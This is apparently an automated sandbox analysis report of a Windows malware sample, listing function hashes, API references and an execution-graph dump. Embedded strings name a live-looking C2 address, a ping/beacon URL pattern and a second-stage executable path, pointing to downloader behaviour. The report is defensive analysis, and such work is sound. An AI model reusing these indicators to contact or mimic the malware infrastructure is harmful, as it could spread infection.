                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
                                                                                                                                                                                                                                    • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 0040CCD3
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                  • Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                  • String ID: "A
                                                                                                                                                                                                                                  • API String ID: 546120528-1838006985
                                                                                                                                                                                                                                  • Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                  • String ID: $^A
                                                                                                                                                                                                                                  • API String ID: 1807457897-1499568600
                                                                                                                                                                                                                                  • Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                                                  • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 2279764990-2564449678
                                                                                                                                                                                                                                  • Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
                                                                                                                                                                                                                                  • API String ID: 3519838083-2876206925
                                                                                                                                                                                                                                  • Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                  • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                                                                                                    • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                  • String ID: T*@
                                                                                                                                                                                                                                  • API String ID: 4198646248-2370032326
                                                                                                                                                                                                                                  • Opcode ID: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                                                                                                    • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                                                                                                  • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Getcoll
                                                                                                                                                                                                                                  • String ID: u@@
                                                                                                                                                                                                                                  • API String ID: 206117190-736001340
                                                                                                                                                                                                                                  • Opcode ID: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

Execution Coverage: 5.2%
Dynamic/Decrypted Code Coverage: 2.5%
Signature Coverage: 0%
Total number of Nodes: 1107
Total number of Limit Nodes: 14
4191ff 44808->44814 44905 41236e 20 API calls __dosmaperr 44809->44905 44912 41236e 20 API calls __dosmaperr 44810->44912 44813 4191b3 44906 412381 20 API calls __dosmaperr 44813->44906 44817 419223 44814->44817 44818 41920e 44814->44818 44815 419291 44913 412381 20 API calls __dosmaperr 44815->44913 44839 41e6fd EnterCriticalSection 44817->44839 44907 41236e 20 API calls __dosmaperr 44818->44907 44822 41921b 44914 410905 26 API calls _Deallocate 44822->44914 44823 419213 44908 412381 20 API calls __dosmaperr 44823->44908 44824 419229 44827 419245 44824->44827 44828 41925a 44824->44828 44825 4191bb std::_Locinfo::_Locinfo_dtor 44825->44797 44909 412381 20 API calls __dosmaperr 44827->44909 44840 4192ad 44828->44840 44832 419255 44911 419284 LeaveCriticalSection __wsopen_s 44832->44911 44833 41924a 44910 41236e 20 API calls __dosmaperr 44833->44910 44836->44789 44837->44800 44838->44792 44839->44824 44841 4192d7 44840->44841 44842 4192bf 44840->44842 44844 419641 44841->44844 44849 41931c 44841->44849 44924 41236e 20 API calls __dosmaperr 44842->44924 44945 41236e 20 API calls __dosmaperr 44844->44945 44845 4192c4 44925 412381 20 API calls __dosmaperr 44845->44925 44848 419646 44946 412381 20 API calls __dosmaperr 44848->44946 44850 4192cc 44849->44850 44852 419327 44849->44852 44857 419357 44849->44857 44850->44832 44926 41236e 20 API calls __dosmaperr 44852->44926 44854 419334 44947 410905 26 API calls _Deallocate 44854->44947 44855 41932c 44927 412381 20 API calls __dosmaperr 44855->44927 44859 419370 44857->44859 44860 4193b2 44857->44860 44861 419396 44857->44861 44859->44861 44893 41937d 44859->44893 44931 417a45 44860->44931 44928 41236e 20 API calls __dosmaperr 44861->44928 44864 41939b 44929 412381 20 API calls __dosmaperr 44864->44929 44868 41951b 44871 419591 44868->44871 44874 419534 GetConsoleMode 44868->44874 44869 4193a2 44930 410905 26 API calls _Deallocate 44869->44930 44870 41629a _free 20 API calls 44873 4193d2 44870->44873 44876 419595 ReadFile 
44871->44876 44875 41629a _free 20 API calls 44873->44875 44874->44871 44879 419545 44874->44879 44880 4193d9 44875->44880 44877 419609 GetLastError 44876->44877 44878 4195af 44876->44878 44881 419616 44877->44881 44882 41956d 44877->44882 44878->44877 44883 419586 44878->44883 44879->44876 44884 41954b ReadConsoleW 44879->44884 44885 4193e3 44880->44885 44886 4193fe 44880->44886 44943 412381 20 API calls __dosmaperr 44881->44943 44902 4193ad __fread_nolock 44882->44902 44940 41234b 20 API calls 2 library calls 44882->44940 44897 4195d4 44883->44897 44898 4195eb 44883->44898 44883->44902 44884->44883 44889 419567 GetLastError 44884->44889 44938 412381 20 API calls __dosmaperr 44885->44938 44888 419800 _Xfiopen 28 API calls 44886->44888 44888->44893 44889->44882 44890 41629a _free 20 API calls 44890->44850 44892 41961b 44944 41236e 20 API calls __dosmaperr 44892->44944 44915 421229 44893->44915 44895 4193e8 44939 41236e 20 API calls __dosmaperr 44895->44939 44941 418fc9 31 API calls 4 library calls 44897->44941 44901 419602 44898->44901 44898->44902 44942 418e09 29 API calls _Xfiopen 44901->44942 44902->44890 44904 419607 44904->44902 44905->44813 44906->44825 44907->44823 44908->44822 44909->44833 44910->44832 44911->44825 44912->44815 44913->44822 44914->44825 44916 421243 44915->44916 44917 421236 44915->44917 44921 42124f 44916->44921 44949 412381 20 API calls __dosmaperr 44916->44949 44948 412381 20 API calls __dosmaperr 44917->44948 44920 42123b 44920->44868 44921->44868 44922 421270 44950 410905 26 API calls _Deallocate 44922->44950 44924->44845 44925->44850 44926->44855 44927->44854 44928->44864 44929->44869 44930->44902 44932 417a83 44931->44932 44933 417a53 IsInExceptionSpec 44931->44933 44952 412381 20 API calls __dosmaperr 44932->44952 44933->44932 44934 417a6e RtlAllocateHeap 44933->44934 44951 412ede 7 API calls 2 library calls 44933->44951 44934->44933 44936 417a81 44934->44936 44936->44870 44938->44895 44939->44902 44940->44902 44941->44902 
44942->44904 44943->44892 44944->44902 44945->44848 44946->44854 44947->44850 44948->44920 44949->44922 44950->44920 44951->44933 44952->44936 44953 409385 44954 409391 CallCatchBlock 44953->44954 44985 40959e 44954->44985 44956 409398 44957 4094eb 44956->44957 44960 4093c2 44956->44960 45086 409a73 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 44957->45086 44959 4094f2 45077 413b51 44959->45077 44969 409401 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 44960->44969 45080 413876 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 44960->45080 44965 4093db 44967 4093e1 44965->44967 45081 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 44965->45081 44975 409462 44969->44975 45082 40e677 39 API calls 5 library calls 44969->45082 44996 409b8d 44975->44996 44986 4095a7 44985->44986 45088 409d1b IsProcessorFeaturePresent 44986->45088 44988 4095b3 45089 40c907 10 API calls 3 library calls 44988->45089 44990 4095b8 44995 4095bc 44990->44995 45090 415329 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 44990->45090 44992 4095c5 44993 4095d3 44992->44993 45091 40c930 8 API calls 3 library calls 44992->45091 44993->44956 44995->44956 45092 40b5a0 44996->45092 44999 409468 45000 4137c7 44999->45000 45094 41e1c1 45000->45094 45002 409471 45005 424b3e 45002->45005 45003 4137d0 45003->45002 45098 41e4cb 38 API calls 45003->45098 45006 424b4e _Xfiopen 45005->45006 45100 401b1e 45006->45100 45008 424b7c 45103 403498 45008->45103 45013 401b1e 27 API calls 45014 424bdc 45013->45014 45110 426354 45014->45110 45017 401b1e 27 API calls 45018 424bf5 GetModuleFileNameA 45017->45018 45019 401b1e 27 API calls 45018->45019 45020 424c1f 45019->45020 45130 425ee2 45020->45130 45022 424c2f 45023 401b1e 27 API calls 45022->45023 45024 4250ca 45023->45024 45149 4034e3 45024->45149 45026 4250f4 45157 
